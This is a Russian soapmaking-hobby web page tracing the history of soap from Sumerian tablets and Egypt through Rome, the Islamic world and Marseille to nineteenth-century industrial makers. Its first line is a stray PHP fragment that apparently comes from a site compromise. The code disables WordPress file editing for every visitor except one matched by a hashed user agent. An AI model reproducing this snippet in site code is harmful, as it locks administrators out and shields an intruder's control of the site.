if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } История мыловарения или как у нас появилось мыло | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

История мыловарения или как у нас появилось мыло

История применения мыла насчитывает не одно тысячелетие. Привычное для нас средство, облегчающее соблюдение гигиены, не всегда вызывает вопрос о том насколько давно и где оно появилось, какую историю развития прошло

Купание в римской бане

Исто­рия при­ме­не­ния мыла насчи­ты­ва­ет не одно тыся­че­ле­тие. При­выч­ное для нас сред­ство, облег­ча­ю­щее соблю­де­ние гиги­е­ны, не все­гда вызы­ва­ет вопрос о том насколь­ко дав­но и где оно появи­лось, какую исто­рию раз­ви­тия про­шло. Исто­рия мыло­ва­ре­ния напол­не­на мифа­ми, одна­ко, они не все­гда подтверждаются.

Древ­нее мыло­ва­ре­ние извест­но еще в Вави­лоне. Уче­ным уда­лось обна­ру­жить пер­вый рецепт при­го­тов­ле­ния мыла, остав­лен­ный древни­ми шуме­ра­ми кли­но­пис­ны­ми сим­во­ла­ми на гли­ня­ных таб­лич­ках. Их воз­раст состав­ля­ет 2800 лет. Рас­шиф­ро­ван­ный шумер­ский рецепт пред­став­лял собой деталь­ное руко­вод­ство по изго­тов­ле­нию мыла. Основ­ны­ми ингре­ди­ен­та­ми были жиры и, полу­ча­е­мая из сожжен­ной дре­ве­си­ны, зола. Для при­го­тов­ле­ния мыла, жиры вари­ли вме­сте с золой на огне. Про­шед­шие тыся­че­ле­тия раз­ви­тия тех­но­ло­гий прак­ти­че­ски ниче­го не изме­ни­ли в мыловарении.

Cuneiform_(1)

Еще одним пись­мен­ным сви­де­тель­ством при­го­тов­ле­ния и исполь­зо­ва­ния мыла в древ­но­сти явля­ет­ся папи­рус Эбер­са. Его воз­раст пре­вы­ша­ет 3.5 тыся­чи лет. В нем содер­жит­ся инфор­ма­ция о том, что древ­ние егип­тяне поль­зо­ва­лись спе­ци­аль­но при­го­тов­лен­ным из жиров, масел и золы веществом.

Егип­тя­нам уда­лось несколь­ко усо­вер­шен­ство­вать древ­нее мыло­ва­ре­ние заме­нив дре­вес­ную золу содой. Резуль­та­том ста­ло уси­ле­ние мою­щих свойств. К тому же не нуж­но было сжи­гать боль­шое коли­че­ство дере­вьев, ведь сода – это не что иное как встре­ча­ю­щий­ся в при­ро­де мине­рал кар­бо­нат натрия. Еще одним источ­ни­ком полу­че­ния соды были водо­рос­ли. С улуч­ше­ни­ем каче­ства мыла рас­ши­ря­ет­ся его при­ме­не­ния. Оно начи­на­ет исполь­зо­вать­ся в стир­ке, а так­же в под­го­тов­ке шер­сти для ткачества.

Мыловарение в Древнем Египте

Мыло­ва­ре­ние в Древ­нем Египте

Исто­рия мыло­ва­ре­ния зна­ет фак­ты вра­че­ва­ния с помо­щью мыла. Оно счи­та­лось эффек­тив­ным сред­ством при лече­нии забо­ле­ва­ний кожи. Его реко­мен­до­ва­ли при кож­ных раз­дра­же­ни­ях и даже в каче­стве лекар­ства от про­ка­зы. В трак­та­тах Ибн Сины (11 ст. н.э.) содер­жат­ся реко­мен­да­ции исполь­зо­ва­ния мыла при обмы­ва­нии кожи боль­ных про­ка­зой и лече­нии кож­ных болез­ней. В тех слу­ча­ях, когда чело­век здо­ров, зна­ме­ни­тый араб­ский лекарь реко­мен­до­вал очи­щать тело при помо­щи гли­ны. Тера­пев­ти­че­ский эффект мыла совре­мен­ные вра­чи объ­яс­ня­ют его спо­соб­но­стью уда­лять загряз­не­ния, откры­вать кож­ные поры и угне­тать раз­ви­тие бак­те­рий. Основ­ной при­чи­ной кож­ных забо­ле­ва­ний у древ­них людей было отсут­ствие эле­мен­тар­ной гиги­е­ны, накап­ли­ва­ю­щи­е­ся в тече­ние дли­тель­но­го вре­ме­ни кож­ное сало и пот слу­жи­ли вели­ко­леп­ной пита­тель­ной сре­дой для раз­ви­тия мно­гих пато­ген­ных микроорганизмов.

Мыловарение в Древнем  Вавилоне

Мыло­ва­ре­ние в Древ­нем Вавилоне

До сих пор неко­то­рые исто­ри­че­ские спра­воч­ни­ки содер­жат оши­боч­ную инфор­ма­цию о древ­нем мыло­ва­ре­нии в Риме. Досад­ная неточ­ность, поро­див­шая исто­ри­че­скую ошиб­ку, появи­лась бла­го­да­ря огре­хам пере­во­да. Соглас­но ей сре­ди руин рим­ской Пом­пеи най­де­но поме­ще­ние, исполь­зо­вав­ше­е­ся для при­го­тов­ле­ния мыла. Впо­след­ствии ока­за­лось, что это фул­ло­ни­ка или древ­няя пра­чеч­ная. Стир­ка тка­ней осу­ществ­ля­лась в боль­ших баках с помо­щью щелоч­но­го рас­тво­ра, а ино­гда даже и мочи. В баки заби­ра­лись работ­ни­ки фул­ло­ни­ки и топ­та­ли белье нога­ми, очи­щая его от пятен.

Sred_ban_01

И все же упо­ми­на­ния об изго­тов­ле­нии мыла встре­ча­ют­ся у древ­не­рим­ских писа­те­лей. В «Есте­ствен­ной исто­рии» Пли­ния Стар­ше­го (1 ст. н.э.) утвер­жда­ет­ся факт актив­но­го исполь­зо­ва­ния мыла рим­ля­на­ми. Пли­нию при­над­ле­жит при­о­ри­тет упо­треб­ле­ния сло­ва «мыло» или «sapo» (лат.). Одна­ко соглас­но при­во­ди­мым исто­ри­ком све­де­ни­ям оно при­ме­ня­лось в каче­стве пома­ды для волос. Так­же Пли­ний упо­ми­на­ет об исполь­зо­ва­нии древни­ми гал­ла­ми и нем­ца­ми, при­го­тов­лен­ной из золы и жира мази, для очи­ще­ния и окра­ши­ва­ния волос. Инте­рес­но то, что поль­зо­ва­лись такой мазью исклю­чи­тель­но мужчины.

Заво­е­ва­ние рим­ля­на­ми гал­лов откры­ло новую стра­нич­ку в исто­рии мыло­ва­ре­ния. Рим­ское мыло­ва­ре­ние заме­ни­ло золу на соду. Полу­чен­ный при сме­ши­ва­нии жира и соды рас­твор кипя­ти­ли до пол­но­го испа­ре­ния воды. В резуль­та­те полу­ча­лось твер­дое кус­ко­вое мыло, отли­чав­ше­е­ся очень высо­кой жест­ко­стью, поэто­му оно при­ме­ня­лось исклю­чи­тель­но для стирки.

Для очи­ще­ния кожи рим­ляне исполь­зо­ва­ли спе­ци­аль­ное при­спо­соб­ле­ние – стри­гиль. Тело сма­зы­ва­ли души­сты­ми мас­ла­ми и с помо­щью стри­ги­ля очи­ща­ли его от гря­зи, пота и остат­ков мас­ла. Бога­тые рим­ляне посе­ща­ли бани, где очист­кой их тела зани­ма­лись спе­ци­аль­но обу­чен­ные рабы.
Еще одна непод­твер­жден­ная леген­да древ­не­го мыло­ва­ре­ния – это исто­рия о горе Сапо. Соглас­но ей назва­ние мыло полу­чи­ло от горы Сапо, рас­по­ла­гав­шей­ся на тер­ри­то­рии Рима и слу­жив­шей местом жерт­во­при­но­ше­ний. Сало живот­ных, зола и дож­де­вая вода сме­ши­ва­ясь, сте­ка­ли вниз к Тиб­ру на бере­гу, кото­ро­го сти­ра­ли белье жен­щи­ны. Имен­но они обра­ти­ли вни­ма­ние на то, что обра­зо­вав­ше­е­ся мазе­об­раз­ное веще­ство хоро­шо отсти­ры­ва­ет загряз­нен­ное белье.

До сих пор оста­ет­ся загад­кой, где же рас­по­ла­га­лась гора Сапо, так как в леген­дах не опи­са­но ее место­по­ло­же­ние. Сло­во «sapo» при­шло из кельт­ско­го и гер­ман­ско­го язы­ков и в пере­во­де на латин­ский озна­ча­ет «жир». Иссле­до­ва­ния исто­ри­ков, опро­вер­га­ют и факт накоп­ле­ния сала. Рим­ляне сжи­га­ли толь­ко несъе­доб­ные внут­рен­но­сти и кости живот­ных, а жир и мясо шли в пищу. Счи­та­ет­ся, что в резуль­та­те жерт­во­при­но­ше­ний не мог­ло нако­пить­ся столь­ко жира, что­бы он сте­кал с горы.

Сле­ду­ю­щим эта­пом в исто­рии мыло­ва­ре­ния ста­ло сред­не­ве­ко­вое изго­тов­ле­ние мыла. Евро­пей­ское мыло­ва­ре­ние фор­ми­ру­ет­ся с кон­ца 13 сто­ле­тия. Вна­ча­ле оно раз­ви­ва­ет­ся в Испа­нии, Ита­лии и Фран­ции. Поз­же мыло­вар­ни появ­ля­ют­ся в Вене и Пра­ге. Основ­ны­ми потре­би­те­ля­ми рос­кош­но­го мыла были дво­ряне и духовенство.

0_c4deb_9c5c0813_XL

Фран­цуз­ский король Людо­вик XIV, поклон­ник рос­ко­ши, поло­жил нача­ло про­мыш­лен­но­му мыло­ва­ре­нию. Им были при­гла­ше­ны спе­ци­а­ли­сты-мыло­ва­ры из Генуи. Мыло фран­цуз­ско­го про­из­вод­ства счи­та­лось наи­бо­лее каче­ствен­ным и доро­гим, так как для его изго­тов­ле­ния при­ме­ня­лись толь­ко про­ван­ские эфир­ные мас­ла. Центр фран­цуз­ско­го мыло­ва­ре­ния очень быст­ро пере­ме­ща­ет­ся в самый круп­ный пор­то­вый фран­цуз­ский город Мар­сель. Здесь варят извест­ней­шее Мар­сель­ское мыло.

Парал­лель­но идет актив­ное раз­ви­тие ита­льян­ско­го и испан­ско­го мыло­ва­ре­ния. Уже с кон­ца 14 сто­ле­тия лиди­ру­ю­щие пози­ции начи­на­ет зани­мать вене­ци­ан­ское мыло, зна­чи­тель­но пре­вос­хо­дя­щее по каче­ству марсельское.

На сме­ну тех­но­ло­гии древ­не­го мыло­ва­ре­ния при­хо­дят сред­не­ве­ко­вые, поз­во­ля­ю­щие полу­чать мыло более высо­ко­го каче­ства. Широ­ко­му рас­про­стра­не­нию мыла сре­ди евро­пей­ско­го насе­ле­ния спо­соб­ство­ва­ло умень­ше­ние его цены бла­го­да­ря исполь­зо­ва­нию каль­ци­ни­ро­ван­ной соды вме­сто золы. Теперь им могут поль­зо­вать­ся самые бед­ные слои насе­ле­ния. Актив­но созда­ют­ся обще­ствен­ные бани и помы­воч­ные. Бур­ный рост раз­ви­тия мыло­ва­ре­ния был при­оста­нов­лен эпи­де­ми­ей бубон­ной чумы (1347–1351 гг.), охва­тив­шей боль­шую тер­ри­то­рию Евро­пы и унес­шей жиз­ни око­ло 1/3 ее населения.

Зна­чи­тель­ный вклад в исто­рию мыло­ва­ре­ния внес­ли мусуль­ман­ские стра­ны. Сред­не­ве­ко­вый ислам­ский мир полу­чил мыло из аптек. Для его при­го­тов­ле­ния исполь­зо­ва­лись рас­ти­тель­ные мас­ла, пре­иму­ще­ствен­но олив­ко­вое, эфир­ные мас­ла (наи­бо­лее часто тимья­но­вое), сме­шан­ные со щело­ча­ми. До сего­дня фор­му­ла при­го­тов­ле­ния мыла изме­ни­лась незна­чи­тель­но. Мыло­ва­рен­ны­ми цен­тра­ми мусуль­ман­ских стран в нача­ле 7 сто­ле­тия ста­ли Бас­ра и Куфа. Наше совре­мен­ное мыло пря­мой пото­мок араб­ско­го древ­не­го мыла. Мусуль­ман­ские масте­ра суще­ствен­но пре­взо­шли в мыло­ва­ре­нии сво­их евро­пей­ских кол­лег. Они гото­ви­ли не толь­ко твер­дое раз­но­цвет­ное и аро­ма­ти­зи­ро­ван­ное мыло, но и жид­кое. По спе­ци­аль­ным рецеп­там вари­лось мыло для бри­тья. Соглас­но исто­ри­че­ским све­де­ни­ям такое мыло про­да­ва­лось в 981 г.н.э. за 0,3 дина­ра. Бла­го­да­ря тру­дам пер­сид­ско­го хими­ка Аль-Рази до нас дошли рецеп­ты древ­не­го мыло­ва­ре­ния. Напри­мер, мас­ло кун­жу­та сме­ши­ва­ют со щело­чью, добав­ля­ют воду и сок лай­ма, обра­зо­вав­шу­ю­ся смесь упа­ри­ва­ют на огне.

Извест­ным в 16 сто­ле­тии мылом счи­та­лось кастиль­ское, про­из­во­ди­мое в Испа­нии реги­он Касти­лия. Пере­ход к ману­фак­тур­но­му про­из­вод­ству уско­ря­ет раз­ви­тие мыло­ва­ре­ния, уве­ли­чи­ва­ют­ся объ­е­мы про­из­вод­ства, уде­шев­ля­ет­ся тех­но­ло­гия и, соот­вет­ствен­но, про­дук­ция. Каж­дая стра­на име­ет соб­ствен­ные мыло­ва­рен­ные заво­ды, ори­ги­наль­ные рецеп­ты и секреты.

Brookes Soap Advertisement 1890

В пери­од инду­стри­а­ли­за­ции раз­ви­тие мыло­ва­ре­ния дви­жет­ся очень бур­но. В кон­це 18 сто­ле­тия в Лон­доне появ­ля­ет­ся про­зрач­ное мыло от Энд­рю Пеарс­на. Уже в 1862 г. сов­мест­но с вну­ком он откры­ва­ет мыло­ва­рен­ный завод в Айл­вор­те. Со 2‑ой поло­ви­ны 19 века деше­вое, но каче­ствен­ное мыло про­да­ет Вильям Гро­седж. Нача­ло 19 века – вре­мя появ­ле­ния пер­во­го сти­раль­но­го порош­ка. Роберт Хад­сон гото­вит его эле­мен­тар­но, рас­ти­рая мыло в ступ­ке с помо­щью пести­ка. Осно­ва­те­ли Юни­ле­вер, круп­ней­шей транс­на­ци­о­наль­ной ком­па­нии, бра­тья Вильям и Джеймс Левер купи­ли в 1885 г. малень­кое про­из­вод­ство, выпус­ка­ю­щее мыло.

Fairbanks-Fairy-Soap

На аме­ри­кан­ском кон­ти­нен­те мыло­ва­рен­ная ману­фак­ту­ра была впер­вые созда­на в Чика­го в 1888 г. Для про­из­вод­ства мыла на ней исполь­зо­ва­ли жир, полу­ча­е­мый в резуль­та­те пере­ра­бот­ки живот­ных. Впо­след­ствии она пре­вра­ти­лась во все­мир­но извест­ную кор­по­ра­цию Диал. Имен­но здесь впер­вые были выпу­ще­ны дез­одо­рант и бак­те­ри­цид­ное мыло.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!